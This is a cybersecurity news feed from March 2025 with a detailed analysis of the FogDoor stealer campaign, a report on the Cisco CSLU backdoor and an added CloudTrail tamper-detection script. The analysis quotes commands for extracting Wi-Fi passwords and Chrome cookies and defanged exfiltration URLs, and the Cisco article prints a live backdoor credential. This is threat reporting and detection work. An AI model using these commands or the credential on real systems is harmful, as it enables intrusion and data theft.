by Cybersecurity Dive
2025-03-24 11:42:19
Medusa Ransomware Uses Malicious Driver to Disable Security ToolsThe Medusa ransomware relies on a malicious Windows driver to disable the security tools running on the infected systems.
by SecurityWeek
2025-03-24 11:40:41
Hackers Exploiting Cisco CSLU Backdoor—SANS Calls for Urgent Action

The SANS Technology Institute has issued a critical warning for organizations using Cisco's Smart Licensing Utility (CSLU), urging them to update their systems immediately to address two serious vulnerabilities. These flaws, which were first disclosed by Cisco in September 2024, pose cybersecurity risks. The vulnerabilities could allow attackers to gain unauthorized access to sensitive information or even take control of affected systems. The Cisco Smart Licensing Utility (CSLU) is primarily used in smaller, on-premises, and air-gapped networks to manage licenses for Cisco products. Unlike the more complex cloud-based Cisco Smart Licensing system, CSLU offers a simpler way to handle licensing in isolated environments. However, these new vulnerabilities—CVE-2024-20439 and CVE-2024-20440—have raised questions due to their potential to expose critical systems to cyberattacks.

CVE-2024-20439 and CVE-2024-20440

Figure: Details of the vulnerabilities (Source: Cisco)

The vulnerabilities discovered within CSLU are notably concerning for their simplicity and severity. CVE-2024-20439, also known as the Static Credential Vulnerability, allows attackers to exploit an undocumented static user credential, granting them administrative access to systems running the affected versions of Cisco Smart Licensing Utility. This flaw is particularly dangerous because it can be exploited remotely, even by unauthenticated users, providing attackers with full administrative privileges via the application’s API. The second vulnerability, CVE-2024-20440, is an Information Disclosure Vulnerability. This flaw arises from excessive verbosity in a debug log file, which can expose sensitive information, including credentials that attackers could use to access the CSLU API. Both vulnerabilities are critical, with Cisco assigning a CVSS base score of 9.8, indicating their high severity.

Exploitation and Early Indicators

In a March 19 report, Johannes Ullrich, Dean of Research at SANS Technology Institute, warned that exploit attempts for these vulnerabilities have already been detected. The exploits target the backdoor credentials that were originally revealed shortly after Cisco’s public advisory in September. The SANS team identified that these credentials were being used in recent API calls. This is not surprising, as security researcher Nicholas Starke had previously reverse-engineered the flaws and shared the backdoor credentials on his blog. Ullrich emphasized that the vulnerability was exacerbated by Cisco’s public advisory, which inadvertently shared details of the backdoor credentials, making it easier for attackers to exploit the issue. The backdoor credentials, identified as cslu-windows-client:Library4C$LU, have been seen in exploit attempts targeting the CSLU API.

Conclusion

Cisco has confirmed that no workarounds are available for the critical vulnerabilities in the Cisco Smart Licensing Utility (CSLU), and the only solution is to apply the patches released by Cisco. Affected organizations running versions 2.0.0, 2.1.0, or 2.2.0 should upgrade to version 2.3.0 or later, which is not vulnerable. This situation highlights the importance of timely software updates to prevent exploitation. With active attacks already detected, organizations are urged to act immediately to secure their systems. For more information, users should visit Cisco’s advisory page or contact Cisco support.
by The Cyber Express
2025-03-24 11:23:01
Take these 5 steps to protect against macOS security gapsOnce security teams recognize that Macs are vulnerable, they can take the needed steps to keep their macOS users safe.
by SC Media
2025-03-24 11:22:18
Attackers can bypass middleware auth checks by exploiting critical Next.js flawA critical flaw in the Next.js React framework could be exploited to bypass authorization checks under certain conditions. Maintainers of the Next.js React framework addressed a critical vulnerability tracked as CVE-2025-29927 (CVSS score of 9.1) with the release of versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3. “Next.js version 15.2.3 has been released to address a security vulnerability […]
by Security Affairs
2025-03-24 11:15:29
Cloak Ransomware Hits Virginia Attorney General’s Office, Disrupts IT SystemsCloak ransomware group claims attack on Virginia attorney general's office, demands ransom for stolen data. Investigation underway. Find out the impact and what's being done.
by Hackread
2025-03-24 11:09:37
FizzBuzz to FogDoor: Targeted Malware Campaign Exploits Job-Seeking Developers

Key Takeaways

- A GitHub repository masqueraded as a coding challenge to deceive developers, particularly targeting Polish-speaking job seekers.
- Opening the provided ISO file triggers a PowerShell script that installs a backdoor named “FogDoor” and steals sensitive data.
- The backdoor retrieves commands from a social media profile and exfiltrates stolen data using temporary webhook services, making detection more difficult.
- The malware extracts browser cookies, saved credentials, installed applications, and file details for exfiltration.
- The malware achieves persistence through scheduled tasks and deletes traces after data exfiltration to avoid detection.
- The campaign is evolving, now using invoice-themed lures alongside recruitment scams to broaden its target scope.

Overview

A Threat Actor (TA) is deploying a targeted social engineering campaign against Polish-speaking developers by disguising malware as a technical coding challenge on GitHub. Using a fake recruitment test named "FizzBuzz", the TA tricks victims into downloading an ISO file containing a seemingly harmless JavaScript exercise and a malicious LNK shortcut. Upon execution, the LNK file runs a PowerShell script, which installs a stealthy backdoor named “FogDoor.” This backdoor is designed for persistence, data theft, and remote command execution while avoiding detection. Instead of using traditional C&C servers, FogDoor communicates with a social media platform via a Dead Drop Resolver (DDR) technique, retrieving attack commands from a social media profile. The malware employs geofencing to restrict execution to Polish victims, ensuring targeted impact. Once active, it systematically steals browser cookies, Wi-Fi credentials, and system data, staging them for exfiltration before deleting traces. Persistence is maintained via a scheduled task, which reactivates the malware every two minutes.

The malware also uses remote debugging to extract Chrome cookies, while Firefox credentials are harvested from profile directories. It then compresses stolen data, uploads it to a file-sharing service, and notifies the TA via a temporary webhook service for retrieval. Further investigation revealed an expansion of the campaign beyond recruitment-based attacks. A newly discovered GitHub repository now distributes malicious invoice-themed LNK shortcuts (e.g., “faktura_2025.pdf.lnk”) using the same FogDoor backdoor and attack infrastructure.

Figure 1 - Infection Chain

Technical Analysis

On March 10, 2025, Cyble Research and Intelligence Labs (CRIL) identified a GitHub repository delivering an information stealer under the guise of a recruitment challenge. The repository, named "FizzBuzz," was created under the username "Rekrutacja-JS" and hosted an ISO file titled "Zadanie rekrutacyjne.iso." The repository name references a well-known coding challenge commonly used in technical interviews, making it appear as a legitimate hiring assessment for developers. The username, written in Polish, translates to "Recruitment-JS," indicating a focus on developers. Meanwhile, the ISO file name, "Zadanie rekrutacyjne," translates to "recruitment task" or "hiring task," reinforcing the illusion that it contains a genuine coding test. This repository is part of a targeted campaign against Polish-speaking developers in Poland and the Polish diaspora in nearby nations. The use of Polish-language elements suggests the attack is tailored for job seekers in this geographic area. Although the exact distribution method remains unclear, the TA is likely using job platforms like LinkedIn or regional developer forums to lure victims into downloading and executing the malicious ISO file.

Figure 2 - GitHub repo

When the user opens the ISO file, two files are displayed: "FizzBuzz.js" and "README.lnk." The "FizzBuzz.js" file contains a JavaScript script that mimics a typical FizzBuzz coding challenge commonly used in programming interviews. However, the script is intentionally flawed, likely to make it appear as a legitimate but buggy test. This could lead the target, typically a developer, to focus on debugging the JavaScript file, reinforcing the illusion of an authentic recruitment task. The figure below shows the contents of the JavaScript file.

Figure 3 - FizzBuzz.js

Upon execution, the shortcut file “README.lnk" runs a PowerShell script hosted on catbox.moe, a free file hosting platform, using mshta.exe. The figure below shows the contents of the LNK file.

Figure 4 - Shortcut file

PowerShell Script

The PowerShell script (SHA-256: 33bc5fa9798219ba6d4e31f91ec23982596c409e0fd73e2c0c33c70538b7ec83) is designed to install a backdoor, extract Chrome cookies, steal Firefox browser data, retrieve Wi-Fi passwords, and collect a list of installed applications on the victim’s machine. Additionally, it opens a “README.txt” file as a decoy to mislead users into believing they are interacting with a harmless file.

Lure file

The PowerShell script first checks if "README.txt" exists in the user's profile directory. If the file is present, it opens it using notepad.exe and exits without executing any malicious actions. However, if the file is missing, the script downloads it from "hxxps://files.catbox.moe/umh6no[.]txt", saves it as “README.txt”, and opens it. This decoy document contains instructions for a code bug fix task, making it appear harmless while ensuring the PowerShell script executes only once on the victim’s machine to carry out malicious activities.

Figure 5 - Lure file

Persistence

Next, the PowerShell script downloads an executable file from “hxxps://raw.githubusercontent.com/coder9540/weather_widget/refs/heads/main/SkyWatchWeather[.]exe” and saves it as “SkyWatchWeather.exe” in the “C:\Users\Public\Downloads” folder. It then creates a scheduled task named “Weather Widget”, which executes the downloaded file using mshta.exe and VBScript. The task is set to run indefinitely every two minutes.

Figure 6 - Scheduled Task

FogDoor

“SkyWatchWeather.exe” acts as a backdoor that does not rely on a traditional C&C server with a fixed IP or domain. Instead, it uses a social media platform (bark.lgbt) and a temporary webhook service (webhookbin.net) as its C&C infrastructure. The executable first identifies the victim's location using the “wttr.in” service, which retrieves weather data along with country information. It then extracts the country name and compares it to the hardcoded value "Poland." If the detected country is "Poland," the malware proceeds to execute its malicious activities. We have named this backdoor “FogDoor” for tracking purposes.

Figure 7 - Country check

Following this verification, the malware attempts to establish a connection with “bark.lgbt/api” to retrieve further commands for execution. These commands are embedded within the profile information of a social media platform and are accessed via the URL “hxxps://bark.lgbt/api/v1/accounts/lookup?acct=PawsitiveVibes”, as shown below.

Figure 8 – Social Media profile information retrieved through API

Once the JSON response is received, the malware extracts the value of the “note” key from the response data, which is expected to contain commands for execution. The “note” field functions as a Dead Drop Resolver (DDR), a technique used to discreetly deliver commands to malware without relying on a traditional command-and-control (C&C) server. Instead of establishing direct communication with an attacker-controlled domain, the malware retrieves instructions embedded within a social media profile, making detection and takedown efforts more challenging. The figure below shows the TA's profile on the social media platform, which is used to store and deliver commands to the malware.

Figure 9 - TA’s social media profile

Once the malware retrieves the command, it executes it using functions like “os_exec_Command” and “os_exec___Cmd__Output”. The resulting output is then transmitted to the TA via a temporary webhook service at “hxxps://webhookbin.net/v1/bin/5673484c-cc92-4490-ada2-aae774c89bc2”, enabling control of the compromised system.

Figure 10 - Sending output data to the TA

Stealing WiFi information

After creating the scheduled task, the PowerShell script sleeps for six minutes before executing a series of commands. It first runs "netsh wlan show profiles" to list all saved Wi-Fi profiles. Then, for each profile, it executes the "netsh wlan show profile name="$name" key=clear" command to extract the SSID and password. The retrieved data is formatted and directly written to "wifi.txt" inside the "%userprofile%\data" folder, serving as a staging area before exfiltration.

Figure 11 – Wi-Fi password extraction

Stealing Chrome browser data

To steal sensitive Chrome data, the PowerShell script first checks if “Chrome.exe” is running. If a process is found, it forcibly terminates it using the command "Stop-Process -Name chrome -Force". It then launches Chrome in debugging mode and restores the last session with the following command:

C:\Program Files\Google\Chrome\Application\chrome.exe --remote-debugging-port=9222 --restore-last-session --user-data-dir="C:\Users\<username>\AppData\Local\Google\Chrome\User Data"

If Chrome was not previously running, the script launches “chrome.exe” with the --headless argument, allowing it to run in the background without a visible interface. Once Chrome is running with remote debugging enabled, the script retrieves the debugging WebSocket URL and passes it to the SendReceiveWebSocketMessage function.

Figure 12 – Demonstration of Extracting webSocketDebuggerURL

It then issues a request using the "Network.getAllCookies" method to extract network cookie data. The retrieved cookies are saved as "chrome.json" inside the "%userprofile%\data" folder, where they are staged for exfiltration.

Figure 13 - Chrome cookie

Stealing Firefox browser data

To steal sensitive Firefox browser data, the script recursively searches for cookies.sqlite, key4.db, logins.json, and places.sqlite files inside the "%appdata%\Roaming\Mozilla\Firefox\Profiles" folder. It then copies these files to the "data" folder for staging before exfiltration.

Figure 14 – Firefox browser data

The script also collects information on installed applications and filenames from the victim’s Desktop, Documents, Downloads, Pictures, and Videos folders. These files are copied to the “%userprofile%\data” folder for staging, allowing the TA to analyze system contents and determine further exploitation opportunities.

Figure 15 - Staged data for exfiltration

Once all required information is collected, the PowerShell script compresses the "%userprofile%\data" folder into "data.zip" and uploads it to the file-sharing service “filebin.net” using a custom URL. The bin name in "hxxps://filebin.net/$binName/data.zip" is a unique GUID, retrieved from the "MachineGUID" registry value located at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography”. After uploading the data, the script sends a notification to the TA via webhookbin.net, using the URL "hxxps://webhookbin.net/v1/bin/1cab2aa2-4984-4f1d-abb7-749611053a91". This notification includes the Machine GUID, allowing the TA to identify the corresponding file upload URL and retrieve the victim’s exfiltrated data.

Figure 16 – Exfiltration

Finally, the exfiltrated data and the staged folder are deleted to remove traces, using the following commands:

Remove-Item $folderName -Recurse
Remove-Item $zipPath

We also discovered another GitHub repository, "hxxps://github.com/coder9440/", indicating that the TA is expanding its ongoing campaign. Initially targeting job-seeking developers, the campaign now includes an invoice-based attack while maintaining the same tactics, techniques, and procedures (TTPs). The repository hosts malicious LNK shortcuts (faktura_2025.pdf.lnk, faktura_586507.pdf.lnk) and a backdoor executable named "SkyWatchWeather.exe," demonstrating the TA's efforts to broaden its attack vectors.

Figure 17 - TA's GitHub Repo

Conclusion

This campaign demonstrates the Threat Actor's adaptability by leveraging social engineering tactics to deliver malware under the guise of recruitment challenges. By embedding malicious payloads within seemingly legitimate coding tasks, the attackers effectively deceive job-seeking developers. The use of social media platforms for command retrieval and staged exfiltration adds another layer of stealth, making detection more challenging. The recent shift from developer-focused lures to invoice-based attacks indicates an expansion in the TA’s target scope while maintaining their established techniques. This evolution underscores their persistent efforts to refine and diversify attack strategies, emphasizing the dynamic nature of modern cyber threats. Cyble’s innovative threat intelligence platforms, Cyble Vision and Cyble Hawk, leverage AI-driven analytics and proactive security strategies to help organizations identify, investigate, and counter these and other evolving cyber threats. By delivering real-time insights, these solutions enhance defenses against targeted attacks like the FizzBuzz recruitment scam, strengthening overall cybersecurity resilience.

Yara and Sigma rules [1],[2] to detect this operation can be downloaded from the linked GitHub repository.

Recommendations

- Always cross-check job offers and coding challenges from unverified sources, especially those shared via social media, job forums, or direct messages.
- Refrain from downloading and running files from unknown repositories, particularly ISO images and script files. Legitimate hiring assessments do not require executing system-level scripts.
- Implement policies to restrict the execution of PowerShell, JavaScript, and other scripting languages unless explicitly required. Use application whitelisting to prevent unauthorized execution.
- Keep an eye on outbound connections to uncommon domains or file-sharing services (e.g., catbox.moe, webhookbin.net) that could indicate data exfiltration attempts.
- Deploy advanced endpoint detection and response (EDR) solutions to identify suspicious behavior, such as unauthorized script execution, scheduled task creation, or browser data access.
- Protect browser-stored credentials by enabling multi-factor authentication (MFA) and using password managers instead of storing sensitive information in browsers.
- Educate employees and developers about the risks of social engineering attacks disguised as job opportunities or business-related communications.
- Keep software, browsers, and security tools up to date to minimize the risk of exploitation through known vulnerabilities.

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Initial Access (TA0001) | Spearphishing Attachment (T1566.001) | The attacker delivers a malicious ISO file disguised as a recruitment task through GitHub.
Execution (TA0002) | User Execution (T1204) | The user opens README.lnk, launching a malicious PowerShell script.
Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file downloads and executes the malicious PowerShell file.
Execution (TA0002) | System Binary Proxy Execution: Mshta (T1218.005) | mshta.exe executes malicious PowerShell commands.
Persistence (TA0003) | Scheduled Task/Job (T1053.005) | A scheduled task, "Weather Widget", ensures persistence.
Credential Access (TA0006) | OS Credential Dumping (T1003) | The script attempts to extract Wi-Fi credentials.
Credential Access (TA0006) | Steal Web Session Cookie (T1539) | The PowerShell script steals Chrome cookies via remote debugging and Firefox browser-related user files.
Discovery (TA0007) | System Information Discovery (T1082) | The PowerShell script collects system information and the list of installed applications.
Collection (TA0009) | Data from Local System (T1005) | The PowerShell script collects Wi-Fi passwords, browser cookies, and file system data.
Collection (TA0009) | Archive Collected Data (T1560) | Stolen data is compressed into data.zip before exfiltration.
Exfiltration (TA0010) | Exfiltration Over Web Service (T1567.002) | Stolen data is uploaded to filebin.net for exfiltration.
Command and Control (TA0011) | Web Service: Dead Drop Resolver (T1102.001) | FogDoor retrieves commands to execute from a social media profile.
Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | The script communicates with WebhookBin for data exfiltration tracking.
Indicators Of Compromise (IOCs)
by CYBLE
2025-03-24 10:51:45
Astral Foods Hit by Cyberattack, Expects R20 Million Loss in Profits

South Africa-listed poultry producer Astral Foods (ARLJ.J) has reported a cybersecurity incident that disrupted its operations and is expected to affect its profits by approximately 20 million rand ($1.10 million) for the six months ending March 31, 2025. The company announced the incident on Monday, stating that it had taken action to mitigate the impact and restore operations. Astral Foods confirmed that the cybersecurity incident occurred on March 16, 2025, leading to downtime in its poultry processing division. The disruption delayed processing and deliveries, affecting revenue generation. Although the company swiftly implemented disaster recovery protocols, the temporary halt in operations resulted in financial losses.

The company stated, “On March 16, 2025, Astral experienced a cybersecurity incident. The Group acted swiftly, implementing all disaster recovery protocols and preparedness plans. However, our Poultry Division was negatively impacted by downtime in processing and deliveries to customers. This resulted in a loss of revenue, and together with costs to catch up on a backlog in production, have impacted the Group’s profits in this reporting period by approximately R20 million.”

By the time of the announcement, Astral Foods confirmed that all business units were operating normally, and its systems had fully recovered. The company assured stakeholders that no confidential or sensitive data related to customers, suppliers, or individuals had been compromised.

Profit Decline Forecasted at 60% Due to Astral Foods Cyberattack

In addition to the cybersecurity incident, Astral Foods expects a significant decline in profits for the first half of the fiscal year. The company forecasts a drop of up to 60% in its half-year profit due to multiple challenges, including the Astral Foods cyberattack, lower poultry prices, and increased production costs. Astral projects its headline earnings to be around 354 cents per share for the first half of the fiscal year. The poultry industry has faced economic pressure due to constrained consumer spending and rising input costs, particularly feed costs that have surged following last year’s drought.

Challenges Facing the Poultry Industry

The poultry sector in South Africa has been experiencing tough conditions due to:

- Lower Chicken Prices: A drop in poultry prices due to reduced consumer spending has affected revenue generation.
- High Input Costs: The costs of feed and production have increased, particularly due to supply chain challenges and climate conditions.
- Operational Setbacks: The cybersecurity incident exacerbated existing financial pressures, disrupting production and causing additional recovery expenses.

Recovery and Assurance to Stakeholders

Astral Foods emphasized that its cybersecurity response was effective in mitigating further risks and preventing data breaches. The company expressed its gratitude to its customers, employees, and service providers for their ongoing support during the recovery period. “We would like to sincerely thank our customers, staff, and service providers for their unwavering support,” Astral stated in its announcement. With all business units now operating normally, the company is focused on maintaining stability and improving performance in the coming months.

Future Outlook

As Astral Foods moves forward, the company aims to strengthen its cybersecurity measures to prevent future incidents. It also continues to navigate economic challenges by optimizing operations, managing costs, and ensuring a resilient supply chain. While the first half of the fiscal year has been impacted, the company remains optimistic about long-term recovery and growth. Astral Foods’s rapid response and recovery efforts prevented further damage, but the financial impact remains significant. With all business units back to normal operations, Astral Foods now focuses on overcoming market challenges and reinforcing its security framework to safeguard future operations. As businesses increasingly rely on digital infrastructure, cybersecurity resilience remains a top priority. The poultry producer’s experience underscores the critical need for proactive measures in safeguarding business continuity against evolving cyber threats.
by The Cyber Express
2025-03-24 10:50:22
Critical Apache Tomcat RCE vulnerability exploitedAttack attempts via CVE-2025-24813 are underway, but successful attacks require specific, non-default configurations, according to GreyNoise.
by Cybersecurity Dive
2025-03-24 10:46:06
MITRE ATT&CK T1562.008 Impair Defenses: Disable or Modify Cloud LogsDisable or Modify Cloud Logs is a defense evasion technique that adversaries use to manipulate cloud logging services to evade detection and obscure their activities. Cloud environments rely on logging solutions like AWS CloudTrail, Azure Monitor, and Google Cloud Logging to track system events, user actions, and security incidents. These logs are critical for threat detection, incident response, and forensic investigations. By disabling, modifying, or deleting cloud logs, attackers can cover their tracks, making it difficult for security teams to identify unauthorized access, privilege escalation, or data exfiltration.
by Picus Security
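The summary above names the behaviour but not how a defender would spot it. The following is an added example (not from Picus Security's write-up) showing detection logic for T1562.008 against AWS CloudTrail: it reads records in CloudTrail's JSON log-file shape and flags the management API calls that stop, delete or narrow a trail. The event names (StopLogging, DeleteTrail, UpdateTrail, PutEventSelectors) are real CloudTrail actions; the account IDs, ARNs, IP addresses and timestamps in the sample log are constructed. Azure Monitor and Google Cloud Logging would need their own event tables.

```python
"""Flag CloudTrail API calls that disable or weaken audit logging (ATT&CK T1562.008).

Added example. Assumes records in CloudTrail's log-file shape ({"Records": [...]});
the sample below is constructed data, not a real account's log.
"""
import json

# CloudTrail API actions whose success stops or narrows what the trail records.
# A starting list, not an exhaustive one.
LOGGING_TAMPER_EVENTS = {
    "StopLogging": "trail stopped delivering events",
    "DeleteTrail": "trail deleted",
    "UpdateTrail": "trail configuration changed",
    "PutEventSelectors": "event selectors changed (management/data events may be dropped)",
}

# UpdateTrail request parameters that, when set to false, reduce trail coverage.
COVERAGE_FLAGS = ("isMultiRegionTrail", "includeGlobalServiceEvents", "enableLogFileValidation")

ACTOR = "arn:aws:iam::111111111111:user/ops-admin"  # constructed principal
SAMPLE_LOG = json.dumps({"Records": [
    {"eventTime": "2025-03-24T10:40:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/auditor"},
     "sourceIPAddress": "203.0.113.10", "requestParameters": None},
    {"eventTime": "2025-03-24T10:41:12Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "userIdentity": {"arn": ACTOR}, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"name": "arn:aws:cloudtrail:us-east-1:111111111111:trail/org-trail"}},
    {"eventTime": "2025-03-24T10:42:30Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "userIdentity": {"arn": ACTOR}, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"name": "org-trail", "isMultiRegionTrail": False,
                           "enableLogFileValidation": False}},
    {"eventTime": "2025-03-24T10:43:05Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DeleteTrail", "userIdentity": {"arn": ACTOR}, "sourceIPAddress": "203.0.113.10",
     "errorCode": "AccessDenied", "requestParameters": {"name": "org-trail"}},
]})


def analyze_cloudtrail(log_text):
    """Return one finding per logging-tamper event, with a severity and a short reason."""
    findings = []
    for rec in json.loads(log_text).get("Records", []):
        if rec.get("eventSource") != "cloudtrail.amazonaws.com":
            continue
        name = rec.get("eventName")
        if name not in LOGGING_TAMPER_EVENTS:
            continue
        params = rec.get("requestParameters") or {}
        reason = LOGGING_TAMPER_EVENTS[name]
        severity = "high"
        if name == "UpdateTrail":
            # Only some trail updates narrow coverage; name the flags that were turned off.
            disabled = [k for k in COVERAGE_FLAGS if params.get(k) is False]
            if disabled:
                reason += ": disabled " + ", ".join(disabled)
            else:
                severity = "medium"
        if rec.get("errorCode"):
            # A denied call did not change logging, but the attempt itself is worth a ticket.
            severity = "medium"
            reason += f" (attempt failed: {rec['errorCode']})"
        findings.append({
            "time": rec.get("eventTime"),
            "event": name,
            "actor": (rec.get("userIdentity") or {}).get("arn", "unknown"),
            "source_ip": rec.get("sourceIPAddress"),
            "trail": params.get("name"),
            "severity": severity,
            "reason": reason,
        })
    return findings


def summarize_by_actor(findings):
    """Group tamper events per principal so a burst from one identity stands out."""
    by_actor = {}
    for f in findings:
        by_actor.setdefault(f["actor"], []).append(f["event"])
    return by_actor


if __name__ == "__main__":
    for f in analyze_cloudtrail(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['time']} {f['event']} by {f['actor']} "
              f"trail={f['trail']}: {f['reason']}")
```

In a real pipeline the same logic runs over the trail's S3 objects or an EventBridge rule on these event names; the point to keep is that a denied StopLogging or DeleteTrail is still a signal, because the caller tried to blind you.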
2025-03-24 10:37:12
NetSfere Launches Quantum-Resilient Messaging Platform for Enterprise and Government Use
NetSfere integrates ML-KEM and AES into its text, voice and video messaging platform to meet 2027 NSA Quantum Security mandates.
by SecurityWeek
2025-03-24 10:31:10
Arsen Introduces AI-Powered Phishing Tests to Improve Social Engineering Resilience
Paris, France, 24th March 2025, CyberNewsWire
by Hackread
2025-03-24 10:30:17
Oracle Denies Claim of Oracle Cloud Breach of 6M Records
A threat actor posted data on BreachForums from an alleged supply chain attack that affected more than 140K tenants, claiming to have compromised the cloud via a zero-day flaw in WebLogic, researchers say.
by Dark Reading
2025-03-24 10:10:00
Albabat Ransomware Expands Targets, Abuses GitHub
New versions of the Albabat ransomware target Windows, Linux, and macOS, and retrieve configuration files from GitHub.
by SecurityWeek
2025-03-24 10:09:01
US lifts Tornado Cash sanctions
Reuters reports that the U.S. has repealed the sanctions the Biden administration imposed on the widely known cryptocurrency mixing service Tornado Cash over its involvement in laundering more than $7 billion for North Korean hackers and other cyber threat actors.
by SC Media
2025-03-24 10:08:27
Widespread Keenetic router data breach uncovered
More than a million households, primarily in Russia, had their credentials, logs, network configurations, and other sensitive details leaked following the compromise of network equipment vendor Keenetic's Mobile App database, Cybernews reports.
by SC Media
2025-03-24 10:07:35
Virginia Attorney General's Office purportedly breached by Cloak ransomware
The Cloak ransomware operation has claimed responsibility for a significant cyberattack against the Virginia Attorney General's Office last month, reports SecurityWeek.
by SC Media
2025-03-24 10:06:02
Credential exfiltration possible with Check Point ZoneAlarm driver bug
Threat actors have abused the vulnerable vsdatant.sys kernel-level driver within the Check Point ZoneAlarm antivirus version released in 2016 to exfiltrate account credentials as part of a Bring Your Own Vulnerable Driver attack, according to Hackread.
by SC Media
2025-03-24 10:05:42
Malware code-signed using Microsoft Trusted Signing service
Malware executables are increasingly being code-signed with three-day certificates from the Microsoft Trusted Signing service as threat actors seek to appear legitimate and avoid being blocked by security systems, according to BleepingComputer.
by SC Media
2025-03-24 10:05:00
Why I am challenging Yvette Cooper’s ‘secret back door’ order against Apple’s encryption
by ComputerWeekly
2025-03-24 10:04:40
Russia subjected to suspected joint Head Mare, Twelve attacks
Russian government-controlled and privately controlled organizations are being targeted in new joint intrusions by the Head Mare and Twelve hacktivist operations; Head Mare was previously found to have used tools and command-and-control servers linked to Twelve, The Hacker News reports.
by SC Media
2025-03-24 10:01:11
Hidden Threats: How Microsoft 365 Backups Store Risks for Future Attacks
Acronis Threat Research found 2M+ malicious URLs & 5,000+ malware instances in Microsoft 365 backup data—demonstrating how built-in security isn't always enough. Don't let threats persist in your cloud data. Strengthen your defenses.
by BleepingComputer
2025-03-24 10:00:00
Will DeepSeek force us to take application security seriously?
by ComputerWeekly
2025-03-24 09:51:25
iProov Workforce MFA mitigates risk of account takeovers
iProov launched iProov Workforce MFA. This device-independent, FIDO Alliance-certified, biometric authentication solution helps organizations mitigate the risk of one of workforce security’s most crucial concerns: account takeover. Using biometric authentication as part of an MFA process adds an irrefutable layer of identity confirmation to help organizations prevent significant financial losses, reputational damage, and operational disruptions. The solution can be used in conjunction with passkeys, or independently of the device, enabling it to run on users’ …
by Help Net Security
2025-03-24 09:40:54
Remote Access Backdoor Discovered in Chinese Robot Dog Unitree Go1
Security researchers have uncovered a pre-installed, undocumented remote access tunnel in Unitree Go1 robot dogs, enabling full remote control and potential lateral network access. The discovery raises serious concerns about supply chain trust, especially as these robots are widely used in academic, corporate, and even defense-related environments. Unitree Robotics, a Chinese company known for producing …
by Cyber Insider
2025-03-24 09:02:00
Encrypted Messaging Apps Promise Privacy. Government Transparency Is Often the Price
Public officials and private citizens are consistently warned about hacking and data leaks, but technologies designed to increase privacy often decrease government transparency.
by SecurityWeek
2025-03-24 09:00:00
Cloud Cost Management Remains Top Challenge Despite Growing FinOps Adoption
Flexera's 2025 State of the Cloud report reveals cloud cost challenges reign supreme as FinOps adoption rises and AI usage soars, with minimal workload repatriation.
by ITPro Today
2025-03-24 09:00:00
What it Takes to Start the Exposure Management Journey
Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to make the shift from vulnerability management to exposure management. In this blog, Tenable Senior Staff Information Security Engineer Arnie Cabral, who is leading the company's internal exposure management journey, shares his experiences. You can read the entire Exposure Management Academy series here.

In my role as an information security engineer at Tenable, I am directly involved in transitioning our own security infrastructure from traditional vulnerability management to a more proactive exposure management approach. The first steps required strategic planning, policy realignment and resource allocation.

The need to move beyond simply identifying vulnerabilities drove Tenable’s transition. We needed to focus on managing real-world exposures that pose significant risk to our security posture.

The starting point: Recognizing the need for change

They say a journey of a thousand miles begins with a single step. At Tenable, our shift to exposure management in our internal infrastructure began with a simple realization. We knew that, although it is critical to modern cybersecurity, vulnerability management alone doesn’t provide a complete picture of cyber risk. Traditional vulnerability management typically involves scanning assets for known vulnerabilities and remediating them based on severity scores. However, true security risk management requires a broader view that includes misconfigurations, attack surface visibility and real-time threat intelligence.

To start our move to cyber exposure management, we reframed our existing policies to align with the new approach. This was not just a simple editing exercise, although there was some carry-over from the current policies. Instead, we redefined our objectives and transformed our policies to ensure alignment with emerging risk-based exposure management frameworks.

Establishing a policy framework

With our new exposure management policy in place, we created a foundation to ensure our security teams have clear guidelines on how to assess, prioritize and remediate exposures beyond just addressing common vulnerabilities and exposures (CVEs). As we completed the policy, we understood the new approach would need to incorporate:

A broader vulnerability assessment of risk, beyond the Common Vulnerability Scoring System (CVSS) scores
Vulnerability prioritization frameworks that account for asset criticality, attack paths and real-world exploitability
The integration of multiple security tools to gain comprehensive visibility for more actionable attack surface management
Alignment with a broader set of stakeholders to match the expanded scope of assets and detections

Building a project plan

Alongside the policy we developed, our team drafted a project plan to operationalize security exposure management. This plan included:

Identifying gaps between the existing risk-based vulnerability management program and the desired state of the exposure management program
Mapping inputs (i.e., the sources of vulnerability and exposure data) and outputs (i.e., the teams responsible for remediation)
Defining key milestones and deliverables
Assigning responsibilities and estimating resource needs

Smaller organizations could manage this process with common tools like spreadsheets. But larger enterprises, like ours, usually turn to platforms like Jira and Confluence to help the process. Of course, no plan would be complete without Gantt charts that provide a visual understanding of the project structure and timeline. My advice is to use tools that help you reach your goals without adding unnecessary process overhead. For example, a platform that integrates data from multiple siloed security tools from multiple vendors gives you a continuous and complete view of your environment and an accurate risk profile.

Addressing operational challenges

One of the key challenges in this transition was the complexity of security operations. Traditional vulnerability management mostly relies on vulnerability scanning assets with Nessus scanners and agents, but the move to exposure management required incorporating other elements, including:

Cloud environments and ephemeral assets
Configuration management across various asset types (i.e., SaaS, PaaS, IaaS and hardware) as well as identity exposure risks
Application security and software development lifecycle (SDLC) vulnerabilities
Third-party security risks

Our teams had to ensure remediation workflows could handle this broader scope while maintaining efficiency. This led to discussions about automation and orchestration — essentially, we wanted to understand how we could centralize the triage and response process without overloading security teams.

How to implement an exposure management program

If your organization is embarking on, or considering starting, your own exposure management journey, here are exposure management best practices and key takeaways from Tenable’s experience:

Don’t neglect traditional vulnerability management: Continuous threat exposure management expands the scope but does not replace foundational vulnerability management practices. CVE-based remediation remains a critical component.
Start with policy and governance: Establish a clear exposure management policy to provide structure, establish service level agreements (SLAs) and ensure accountability.
Align teams: Organize teams and resources to ensure they’re working in support of your exposure management policy.
Prioritize based on real-world risk: Not all vulnerabilities pose immediate threats. Focus on threat exposures that present actual risk based on attack feasibility.
